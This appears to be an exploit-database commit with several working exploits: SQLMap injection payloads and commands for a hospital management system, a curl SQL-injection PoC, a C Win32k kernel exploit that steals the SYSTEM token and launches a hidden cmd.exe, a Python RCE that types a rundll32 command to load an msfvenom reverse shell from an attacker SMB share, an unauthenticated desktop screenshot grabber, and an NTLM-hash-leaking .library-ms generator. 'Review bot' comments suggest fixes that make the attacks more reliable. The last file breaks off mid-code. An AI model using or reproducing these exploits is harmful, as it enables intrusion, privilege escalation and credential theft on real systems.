Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
Upgrade-Insecure-Requests: 1
Priority: u=0, i
fromdate=&todate=&submit=
=======================================|| Blind Time Based - fromdate field ||==============================================
SQLMap identified the following injection payload:
Parameter: fromdate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”
=======================================|| Boolean Based - todate field ||==============================================
todate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”
=======================================|| Union Query - todate field ||==============================================
Another technique on todate field can be exploited
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”
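Review bot: The advisory never states whether authentication is required, yet the vulnerable page is under `/admin/` and the recorded request carries a `PHPSESSID` cookie and a `Referer` from `/admin/between-dates-reports.php`, which suggests an authenticated admin session is a precondition; this materially changes the severity and should be spelled out, e.g. `# Authentication: admin session required (report reached via /admin/between-dates-reports.php)` — or an explicit statement that it works unauthenticated if that was verified. The sqlmap commands assume `request.txt` is the captured POST above, so a reproducer must refresh the `Cookie:` header before running them. The UNION payload's 11-column count is a property of the tested build's query and may differ in other versions.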


@ -0,0 +1,22 @@
# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542
# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by sending
# a malicious POST request to delay server response and infer data.
# PoC Request (simulated using curl):
curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="
# The server response will be delayed if the SQL condition is true, confirming the injection point.
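Review bot: The PoC depends on a timing difference but gives the reader no way to measure it or anything to compare against. Add `-s -o /dev/null -w '%{time_total}\n'` to the curl invocation and show the same request once without the injected `XOR(...)` clause so the ~6 s gap is visible, and note that a single sample on a slow backend can be a false positive — repeat it or vary the sleep value. `registrationform` is referenced without an extension; if the actual route in the tested tree is `registrationform.php`, the command as written returns 404, so the path should be confirmed.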


@ -0,0 +1,623 @@
# Exploit Title: Microsoft Windows Server 2016 - Win32k Elevation of
Privilege
# Date: 2025-05-19
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Country: United Kingdom
# CVE : CVE-2023-29336
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#define IDM_MYMENU 101
#define IDM_EXIT 102
#define IDM_DISABLE 0xf120
#define IDM_ENABLE 104
#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440
#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
#define EPROCESS_TOKEN_OFFSET 0x4b8
typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT
uIDEnableItem, UINT uEnable);
typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2,
unsigned __int64 a3, unsigned int a4);
typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);
typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID,
int nConsoleInformationLength);
NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;
NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;
NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;
fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM
lParam);
int syytem();
typedef struct _SHELLCODE {
DWORD reserved;
DWORD pid;
DWORD off_THREADINFO_ppi;
DWORD off_EPROCESS_ActiveLink;
DWORD off_EPROCESS_Token;
BOOL bExploited;
BYTE pfnWindProc[];
} SHELLCODE, * PSHELLCODE;
struct tagMENU
{
ULONG64 field_0;
ULONG64 field_8;
ULONG64 field_10;
ULONG64 field_18;
ULONG64 field_20;
PVOID obj28;
DWORD field_30;
DWORD flag1;
DWORD flag2;
DWORD cxMenu;
DWORD cyMenu;
ULONG64 field_48;
PVOID rgItems;
ULONG64 field_58; // + 0x58
ULONG64 field_60;
ULONG64 field_68;
ULONG64 field_70;
ULONG64 field_78;
ULONG64 field_80;
ULONG64 field_88;
ULONG64 field_90;
PVOID ref; // + 0x98
};
struct MyData
{
BYTE name[0x96];
};
tagMENU* g_pFakeMenu = 0;
static PSHELLCODE pvShellCode = NULL;
HMENU hSystemMenu;
HMENU hMenu;
HMENU hSubMenu;
HMENU hAddedSubMenu;
HMENU hMenuB;
PVOID MENU_add = 0;
DWORD flag = 0;
UINT iWindowCount = 0x100;
HWND HWND_list[0x300];
HWND HWND_list1[0x20];
HMENU HMENUL_list[0x300];
int Hwnd_num = 0;
int Hwnd_num1 = 0;
ULONGLONG HWND_add = 0;
ULONGLONG GS_off = 0;
WORD max = 0;
static PULONGLONG ptagWNDFake = NULL;
static PULONGLONG ptagWNDFake1 = NULL;
static PULONGLONG ptagWNDFake2 = NULL;
static PULONGLONG GS_hanlde = NULL;
static PULONGLONG HWND_class = NULL;
struct ThreadParams {
int threadId;
int numLoops;
};
static unsigned long long GetGsValue(unsigned long long gsValue)
{
return gsValue;
}
PVOID
GetMenuHandle(HMENU menu_D)
{
int conut = 0;
PVOID HANDLE = 0;
PBYTE add = 0;
WORD temp = 0;
DWORD offset = 0xbd688;
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
ULONGLONG par1 = 0;
DWORD par2 = 0;
memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);
add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);
if (add)
{
HANDLE = *(PVOID*)add;
}
else
{
HANDLE = 0;
}
HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20);
return *(PVOID*)HANDLE;
}
PVOID
xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)
{
int conut = 0;
PVOID HANDLE = 0;
PBYTE add = 0;
WORD temp = 0;
DWORD offset = 0xbd688;
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
ULONGLONG par1 = 0;
DWORD par2 = 0;
memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);
temp = (ULONGLONG)menu_D >> 16;
add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);
if (add)
{
HANDLE = *(PVOID*)add;
}
else
{
HANDLE = 0;
}
HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20);
return *(PVOID*)HANDLE;
}
static
VOID
xxReallocPopupMenu(VOID)
{
for (INT i = 0; i < 0x8; i++)
{
WNDCLASSEXW Class = { 0 };
WCHAR szTemp[0x100] = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp,
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d",
i);
Class.cbSize = sizeof(WNDCLASSEXA);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
if (!RegisterClassExW(&Class))
{
continue;
}
}
}
VOID
createclass(VOID)
{
WCHAR szTemp[0x100] = { 0 };
for (INT i = 9; i < 29; i++)
{
WNDCLASSEXW Class = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp, L"A@A%d", i);
Class.cbSize = sizeof(WNDCLASSEXA);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0x20;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
Class.cbClsExtra = 0x1a0;
if (!RegisterClassExW(&Class))
{
continue;
}
}
for (INT i = 9; i < 29; i++)
{
wsprintfW(szTemp, L"A@A%d", i);
HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0,
0, 0, NULL,NULL, NULL, NULL);
}
}
ULONG64 Read64(ULONG64 address)
{
MENUBARINFO mbi = { 0 };
mbi.cbSize = sizeof(MENUBARINFO);
g_pFakeMenu->rgItems = PVOID(address - 0x48);
GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi);
return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);
}
void exploit()
{
for (int i = 0; i < 0x20; i++)
{
ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270,
(LONG_PTR)g_pFakeMenu);
if (pmenu != 0)
{
Hwnd_num = i;
MENUBARINFO mbi = { 0 };
mbi.cbSize = sizeof(MENUBARINFO);
}
}
// Token stealing
ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO
p = Read64(p); //THREADINFO
p = Read64(p + 0x220); // (PROCESSINFO)
ULONG64 eprocess = p;
printf("Current EPROCESS = %llx\n", eprocess);
p = Read64(p + 0x2f0);
do {
p = Read64(p + 0x08);
ULONG64 pid = Read64(p - 0x08);
if (pid == 4) {
ULONG64 pSystemToken = Read64(p + 0x68);
printf("pSys/tem Token = %llx \n", pSystemToken);
HWND_class = (PULONGLONG)((PBYTE)0x303000);
HWND_class[8] = eprocess + 0x290;
HWND_class[12] = 0x100;
HWND_class[20] = 0x303010;
ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 +
0x98 - 0xa0, (LONG_PTR)HWND_class);
SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);
ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 -
0xa0, (LONG_PTR)ret_add);
break;
}
} while (p != eprocess);
syytem();
}
void buildmem()
{
WORD max_handle = 0;
pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
{
return;
}
ZeroMemory(pvShellCode, 0x10000);
ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);
ptagWNDFake[0] = (ULONGLONG)0x304140;
ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;
ptagWNDFake[6] = (ULONGLONG)0x304140;
ptagWNDFake[8] = 0x305300;
ptagWNDFake[11] = (ULONGLONG)MENU_add;
ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;
ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;
ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;
ptagWNDFake[71] = (ULONGLONG)0x000004;
ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);
ptagWNDFake1[1] = (ULONGLONG)0x11;
ptagWNDFake1[2] = (ULONGLONG)0x305320;
ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;
ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;
ptagWNDFake1[14] = (ULONGLONG)0x306500;
ptagWNDFake1[16] = (ULONGLONG)305400;
ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);
ptagWNDFake1[11] = (ULONGLONG)0x306600;
WNDCLASSEX WndClass = { 0 };
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.lpfnWndProc = DefWindowProc;
WndClass.style = CS_VREDRAW | CS_HREDRAW;
WndClass.cbWndExtra = 0xe0;
WndClass.hInstance = NULL;
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = L"NormalClass";
RegisterClassEx(&WndClass);
for (int i = 0; i < 0x200; i++)
{
HMENUL_list[i] = CreateMenu();
}
for (int i = 0; i < 0x100; i++)
{
HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL,
WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);
}
for (int i = 0; i < 0x100; i++)
{
SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);
SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);
}
for (int i = 0x20; i < 0x60; i++)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2],
0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1],
0x01)== 0x250)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 +
1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)
== 0x250)
{
HWND_add =
(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);
max = i * 2;
break;
}
}
if (i == 0x5f)
{
HWND_add = 0;
}
}
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;
DestroyWindow(HWND_list[max]);
createclass();
// Create a fake spmenu
PVOID hHeap = (PVOID)0x302000;
g_pFakeMenu = (tagMENU*)(PVOID)0x302000;
g_pFakeMenu->ref = (PVOID)0x302300;
*(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;
// cItems = 1
g_pFakeMenu->obj28 = (PVOID)0x302200;
*(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;
// rgItems
g_pFakeMenu->rgItems = (PVOID)0x304000;
// cx / cy must > 0
g_pFakeMenu->flag1 = 1;
g_pFakeMenu->flag2 = 1;
g_pFakeMenu->cxMenu = 1;
g_pFakeMenu->cyMenu = 1;
//
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR
lpCmdLine, int nCmdShow)
{
ULONGLONG gsValue = 0;
unsigned char shellcode[] =
"\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3";
LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode),
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (executableMemory == NULL) {
return 1;
}
memcpy(executableMemory, shellcode, sizeof(shellcode));
gsValue = ((ULONGLONG(*)())executableMemory)();
gsValue = gsValue + 0x800;
GS_hanlde = (PULONGLONG)(PBYTE)gsValue;
GS_off = GS_hanlde[5];
char str[0xb8] = "";
memset(str, 0x41, 0xa8);
g_NtUserEnableMenuItem =
(NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserEnableMenuItem");
g_NtUserSetClassLongPtr =
(NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserSetClassLongPtr");
g_NtUserCreateAcceleratorTable =
(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserCreateAcceleratorTable");
g_pfnNtUserConsoleControl =
(fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserConsoleControl");
WNDCLASS wc = { 0 };
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = TEXT("EnableMenuItem");
RegisterClass(&wc);
HWND hWnd = CreateWindow(
wc.lpszClassName,
TEXT("EnableMenuItem"),
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,
CW_USEDEFAULT,
400, 300,
NULL,
NULL,
hInstance,
NULL
);
if (!hWnd) return FALSE;
///
hSystemMenu = GetSystemMenu(hWnd, FALSE);
hSubMenu = CreatePopupMenu();
MENU_add = GetMenuHandle(hSubMenu);
hMenuB = CreateMenu();
buildmem();
if (HWND_add == 0)
{
return 0;
}
AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0"));
AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1"));
DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);
AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A");
AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B");
ShowWindow(hWnd, nCmdShow);
UpdateWindow(hWnd);
flag = 1;
g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);
exploit();
MSG msg = { 0 };
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (int)msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM
lParam)
{
switch (message)
{
case WM_DESTROY:
PostQuitMessage(0);
return 0;
case 0xae:
switch (wParam)
{
case 0x1000:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
case 0x1001:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
return 0;
}
break;
}
return DefWindowProc(hWnd, message, wParam, lParam);
}
int syytem()
{
SECURITY_ATTRIBUTES sa;
HANDLE hRead, hWrite;
byte buf[40960] = { 0 };
STARTUPINFOW si;
PROCESS_INFORMATION pi;
DWORD bytesRead;
RtlSecureZeroMemory(&si, sizeof(si));
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&sa, sizeof(sa));
int br = 0;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead, &hWrite, &sa, 0))
{
return -3;
}
si.cb = sizeof(STARTUPINFO);
GetStartupInfoW(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.lpDesktop = L"WinSta0\\Default";
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
wchar_t cmd[4096] = { L"cmd.exe" };
if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si,
&pi))
{
CloseHandle(hWrite);
CloseHandle(hRead);
printf("[!] CreateProcessW Failed![%lx]\n", GetLastError());
return -2;
}
CloseHandle(hWrite);
}
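Review bot: `syytem()` redirects the child's stdout/stderr into a pipe, closes the write end and then returns without ever reading `hRead`, waiting on the process, or closing `hRead`, `pi.hProcess` or `pi.hThread`; together with `SW_HIDE` the SYSTEM `cmd.exe` is invisible and will block once the pipe buffer fills, and the function falls off the end of its success path with no `return`, which is undefined behaviour for an `int` function. Either drop `STARTF_USESTDHANDLES`/`SW_HIDE` so the shell is interactive, or read `hRead` in a loop, then `WaitForSingleObject(pi.hProcess, INFINITE);` and close the handles before `return 0;`. Every kernel offset is a bare literal (`0x2f0` for the process-list walk, `p + 0x68` for the token, `0x220`, the USER32 handle-table offset `0xbd688`), the `EPROCESS_*` macros at the top are never used and disagree with those literals (`EPROCESS_TOKEN_OFFSET 0x4b8` vs. the `0x68`-relative read), and the `do { } while (p != eprocess)` walk has no iteration bound — on any build other than the one the author tested, `Read64` through the forged menu reads arbitrary kernel memory and the result is a bugcheck rather than a shell, so the exact build number should be stated in the header and the offsets gated on it. `GetMenuHandle` and `xxGetHMValidateHandle` are the same routine line for line; keep one.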

132
exploits/windows/remote/52299.py Executable file

@ -0,0 +1,132 @@
# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045
# Start Remote Keyboard Desktop on your windows
# Preparing:
#
# 1. Generating payload (dll/exe):
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
# 3. nc -lnvp 8080
# 4. python exploit.py
#####
#!/usr/bin/env python3
import websocket
import json
import time
target = "192.168.8.105"
lhost = "192.168.8.101"
WS_URL = f"ws://{target}:8080/"
payload = "shell2.dll" # payload dll/exe filename
debug = False
HEADER_LIST = [
"User-Agent: Dart/3.7 (dart:io)",
f"Origin: http://{target}:8080",
"Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
]
#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based
SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
based
special_mapping = {
' ': ("SPACE", False),
'/': ("NUMPAD_DIVIDE", False),
'\\': ("\\", False),
'.': ("NUMPAD_DECIMAL", False),
',': (",", False),
}
def send_key_event(ws, key, key_down):
event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
key_down, "capsLock": False}}
ws.send(json.dumps(event))
def send_text(ws, text, delay=0.05):
shift_pressed = False
for ch in text:
if ch in special_mapping:
key_name, need_shift = special_mapping[ch]
elif ch.isalpha():
need_shift = ch.isupper()
key_name = ch.upper()
elif ch.isdigit():
key_name = ch
need_shift = False
else:
raise ValueError(f"No key mapping for character: {ch!r}")
if need_shift and not shift_pressed:
send_key_event(ws, "SHIFT", True)
shift_pressed = True
elif not need_shift and shift_pressed:
send_key_event(ws, "SHIFT", False)
shift_pressed = False
send_key_event(ws, key_name, True)
send_key_event(ws, key_name, False)
time.sleep(delay)
if shift_pressed:
send_key_event(ws, "SHIFT", False)
def send_key(ws, keys, delay=0.05):
for key in keys:
send_key_event(ws, key, True)
time.sleep(delay)
for key in reversed(keys):
send_key_event(ws, key, False)
def on_open(ws):
print ("Let's start!")
send_key(ws, ["LEFT_WINDOWS", "R"])
time.sleep(0.5)
send_text(ws, SMB_PATH)
send_key(ws, ["RETURN"])
print ("Executing...")
time.sleep(1.2)
print("Check your listener!")
if debug:
print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
")
ws.close()
def on_message(ws, message):
if debug:
print("[=] Received:", message)
def on_error(ws, error):
if debug:
print("[!] Error:", error)
def on_close(ws, code, reason):
if debug:
print(f"[x] Closed: {code} - {reason}")
if __name__ == "__main__":
websocket.enableTrace(debug)
ws = websocket.WebSocketApp(
WS_URL,
header=HEADER_LIST,
on_open=on_open,
on_message=on_message,
on_error=on_error,
on_close=on_close
)
ws.run_forever()
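Review bot: The `#!/usr/bin/env python3` line is placed after the header comment block rather than on line 1, so even though the file is committed with the executable bit the shebang is ineffective; the same ordering issue affects the two other Python files in this commit whose shebang follows a comment block or module docstring. Two statements appear to wrap across physical lines as rendered — the `SMB_PATH = ... # dll` / `based` comment and the `print("\033[42;37m...` literal in `on_open` — and if the committed file really contains those breaks the module fails with a NameError/SyntaxError before anything runs; worth confirming against the raw file. `import websocket` refers to the third-party `websocket-client` package (the `WebSocketApp`/`enableTrace` API), which is not recorded anywhere; a one-line `# requires: websocket-client (pip install websocket-client)` next to the import would save the next reader from installing the wrong `websocket` distribution.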


@ -0,0 +1,61 @@
# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)
'''
Description:
- Exploits the getScreenshot API endpoint in Remote for Windows helper
service
- Works when "Allow unknown devices" setting is enabled (default: disabled)
- Captures current desktop including login screens (SYSTEM-level access)
Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks
# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def capture_screenshot(ip, port, output_file):
try:
response = requests.get(
f"https://{ip}:{port}/api/getScreenshot",
headers={
"X-ClientToken": "exploit",
"X-HostName": "attacker-pc",
"X-HostFullModel": "exploit-device"
},
verify=False,
timeout=15
)
if response.status_code == 200 and
response.content.startswith(b'\xff\xd8'):
with open(output_file, 'wb') as f:
f.write(response.content)
print(f"[+] Saved: {output_file}")
return True
print(f"[-] Failed: HTTP {response.status_code}")
return False
except Exception as e:
print(f"[-] Error: {str(e)}")
return False
if __name__ == "__main__":
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
sys.exit(1)
sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
else 1)
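Review bot: The `except Exception` in `capture_screenshot` swallows every error, including programming mistakes, and reports them as a generic failure; narrowing it to `except requests.RequestException as e:` keeps the intended handling for connection/TLS/timeout errors while letting anything else surface with a traceback. `verify=False` is deliberate here because of the self-signed `SecureHTTPServer` certificate named in the docstring, but nothing in the code says so — a comment such as `# self-signed cert (see Identification above); verification intentionally disabled` would stop a later cleanup from "fixing" it. The `#!/usr/bin/env python3` line follows the module docstring, so it is not a usable shebang and belongs on line 1.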


@ -0,0 +1,85 @@
#!/usr/bin/env python3
# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
# Exploit Author: Mohammed Idrees Banyamer
# Twitter/GitHub:https://github.com/mbanyamer
# Date: 2025-05-27
# CVE: CVE-2025-24071
# Vendor: Microsoft
# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
# Tested on: Windows 11 (23H2)
# Type: Local / Remote (NTLM Leak)
# Platform: Windows
# Vulnerability Type: Information Disclosure
# Description:
# Windows Explorer automatically initiates an SMB authentication request when a
# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
# (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
# No user interaction is required beyond extraction.
import zipfile
from pathlib import Path
import argparse
import re
import sys
from colorama import Fore, Style
def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
"""Creates a malicious .library-ms file pointing to an attacker's SMB server."""
payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>'''
output_file = output_dir / f"(unknown).library-ms"
output_file.write_text(payload, encoding="utf-8")
return output_file
def build_zip(library_file: Path, output_zip: Path):
"""Packages the .library-ms file into a ZIP archive."""
with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive:
archive.write(library_file, arcname=library_file.name)
print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}")
def is_valid_ip(ip: str) -> bool:
return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive",
epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)")
parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)")
parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)")
parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation")
args = parser.parse_args()
if not is_valid_ip(args.ip):
print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}")
sys.exit(1)
output_dir = Path(args.output)
